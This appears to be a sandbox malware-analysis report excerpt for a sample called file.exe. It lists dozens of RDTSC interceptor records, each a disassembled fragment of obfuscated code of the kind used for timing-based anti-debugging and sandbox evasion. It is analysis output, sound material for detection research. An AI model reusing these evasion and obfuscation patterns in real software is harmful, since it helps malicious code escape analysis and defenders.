Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57D9ED second address: 57DA43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FD001095A58h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D1B68h], edx 0x00000030 xchg eax, ebx 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jng 00007FD001095A56h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57DA43 second address: 57DA4F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58184E second address: 581852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 581852 second address: 581858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 581858 second address: 58185F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5829E4 second address: 5829E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5829E9 second address: 582A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1AF5h], edi 0x0000000e sbb di, 78C7h 0x00000013 push 00000000h 0x00000015 mov edi, 26104D06h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007FD001095A58h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 jmp 00007FD001095A68h 0x0000003b mov edi, dword ptr [ebp+12467085h] 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 jne 00007FD001095A56h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 582A4E second address: 582A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 582A53 second address: 582A69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007FD001095A56h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FD001095A56h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 582A69 second address: 582A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57E2C8 second address: 57E2D2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5809CC second address: 5809D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5809D2 second address: 5809D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 585FFD second address: 58604B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C62h 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FD000CC0C58h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 movsx ebx, di 0x0000002a push 00000000h 0x0000002c mov ebx, esi 0x0000002e xchg eax, esi 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 js 00007FD000CC0C56h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58604B second address: 586065 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FD001095A5Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5862DE second address: 5862F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535533 second address: 53553F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnc 00007FD001095A56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53553F second address: 535543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58B904 second address: 58B9C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007FD001095A5Ch 0x0000000f jmp 00007FD001095A67h 0x00000014 popad 0x00000015 nop 0x00000016 jmp 00007FD001095A62h 0x0000001b push 00000000h 0x0000001d jmp 00007FD001095A66h 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 call 00007FD001095A58h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 add dword ptr [esp+04h], 0000001Ah 0x00000039 inc eax 0x0000003a push eax 0x0000003b ret 0x0000003c pop eax 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D1DA7h], eax 0x00000044 mov dword ptr [ebp+12465B64h], edi 0x0000004a xchg eax, esi 0x0000004b pushad 0x0000004c pushad 0x0000004d jng 00007FD001095A56h 0x00000053 jmp 00007FD001095A69h 0x00000058 popad 0x00000059 push ebx 0x0000005a ja 00007FD001095A56h 0x00000060 pop ebx 0x00000061 popad 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jp 00007FD001095A5Ch 0x0000006b jnl 00007FD001095A56h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58CAF2 second address: 58CAF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58CAF7 second address: 58CB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A5Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD001095A67h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58BACE second address: 58BB58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FD000CC0C58h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D2ECFh] 0x00000029 push dword ptr fs:[00000000h] 0x00000030 pushad 0x00000031 mov ax, bx 0x00000034 mov ecx, dword ptr [ebp+122D1F65h] 0x0000003a popad 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov bx, cx 0x00000045 jg 00007FD000CC0C57h 0x0000004b mov eax, dword ptr [ebp+122D15C9h] 0x00000051 sbb ebx, 5EF8C6ADh 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push ebx 0x0000005c call 00007FD000CC0C58h 0x00000061 pop ebx 0x00000062 mov dword ptr [esp+04h], ebx 0x00000066 add dword ptr [esp+04h], 00000014h 0x0000006e inc ebx 0x0000006f push ebx 0x00000070 ret 0x00000071 pop ebx 0x00000072 ret 0x00000073 mov ebx, dword ptr [ebp+122D2D77h] 0x00000079 nop 0x0000007a push eax 0x0000007b push edx 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58BB58 second address: 58BB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD001095A56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58BB63 second address: 58BB69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58AB3A second address: 58AB40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58DD73 second address: 58DD94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58DD94 second address: 58DD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58DD9A second address: 58DD9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58EDCF second address: 58EE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FD001095A66h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD001095A62h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590CA1 second address: 590CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C66h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58FD55 second address: 58FD59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590CBC second address: 590D2A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD000CC0C63h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FD000CC0C58h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov bx, CE7Fh 0x0000002d sub dword ptr [ebp+122D239Bh], edi 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D3ADAh], esi 0x0000003b push 00000000h 0x0000003d jmp 00007FD000CC0C5Ah 0x00000042 xchg eax, esi 0x00000043 push edi 0x00000044 push edx 0x00000045 js 00007FD000CC0C56h 0x0000004b pop edx 0x0000004c pop edi 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 pushad 0x00000052 popad 0x00000053 pushad 0x00000054 popad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58FE58 second address: 58FE5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 591C42 second address: 591C48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 591C48 second address: 591CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FD001095A58h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 sub dword ptr [ebp+122D3A31h], edi 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007FD001095A58h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 push ecx 0x00000046 or dword ptr [ebp+122D3A5Bh], edx 0x0000004c pop ebx 0x0000004d mov di, D602h 0x00000051 push 00000000h 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push ecx 0x00000058 pop ecx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 591CB0 second address: 591CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590E6B second address: 590EE5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD001095A5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d add ebx, 2BA3B991h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov dword ptr [ebp+122D364Eh], eax 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 call 00007FD001095A5Bh 0x0000002c mov ebx, eax 0x0000002e pop ebx 0x0000002f mov eax, dword ptr [ebp+122D133Dh] 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FD001095A58h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f mov ebx, 742E4FF6h 0x00000054 mov dword ptr [ebp+12458E47h], edx 0x0000005a push FFFFFFFFh 0x0000005c mov bx, 1C00h 0x00000060 push eax 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 push esi 0x00000065 pop esi 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 591CB4 second address: 591CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590EE5 second address: 590EF7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FD001095A56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 591CBE second address: 591CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 590EF7 second address: 590EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 591EEA second address: 591EEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 599B29 second address: 599B45 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD001095A58h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FD001095A5Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 599402 second address: 599407 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 599407 second address: 599412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59955C second address: 599572 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 599572 second address: 599576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 599576 second address: 599586 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD000CC0C56h 0x00000008 jng 00007FD000CC0C56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5996F4 second address: 5996F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59CB8F second address: 59CB93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59CB93 second address: 59CB9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59CB9F second address: 59CBA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59CBA3 second address: 59CBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 537035 second address: 53704A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C5Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59EE90 second address: 59EEA2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FD001095A56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A5A5E second address: 5A5A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A5A69 second address: 5A5A73 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD001095A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A5A73 second address: 5A5A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FD000CC0C56h 0x0000000e ja 00007FD000CC0C56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A5566 second address: 5A5572 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A5572 second address: 5A5594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Eh 0x00000007 pushad 0x00000008 jmp 00007FD000CC0C5Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A5594 second address: 5A55BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD001095A56h 0x0000000a jne 00007FD001095A56h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD001095A63h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A58C7 second address: 5A58CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A58CF second address: 5A58F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD001095A65h 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FD001095A56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AE2AA second address: 5AE2B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AE2B1 second address: 5AE2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jc 00007FD001095A60h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ACE19 second address: 5ACE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD000CC0C56h 0x0000000a popad 0x0000000b pushad 0x0000000c jg 00007FD000CC0C56h 0x00000012 jmp 00007FD000CC0C5Bh 0x00000017 popad 0x00000018 pushad 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ACE3C second address: 5ACE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD001095A56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ACE48 second address: 5ACE53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ACE53 second address: 5ACE63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jc 00007FD001095A56h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AD136 second address: 5AD13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AD67C second address: 5AD692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD001095A62h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AD692 second address: 5AD6AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AD6AF second address: 5AD6B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ADBE9 second address: 5ADBED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ADBED second address: 5ADBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ADBF3 second address: 5ADC10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FD000CC0C56h 0x00000009 jmp 00007FD000CC0C60h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ACB31 second address: 5ACB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A62h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5ACB4B second address: 5ACB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5B4D3A second address: 5B4D59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD001095A65h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
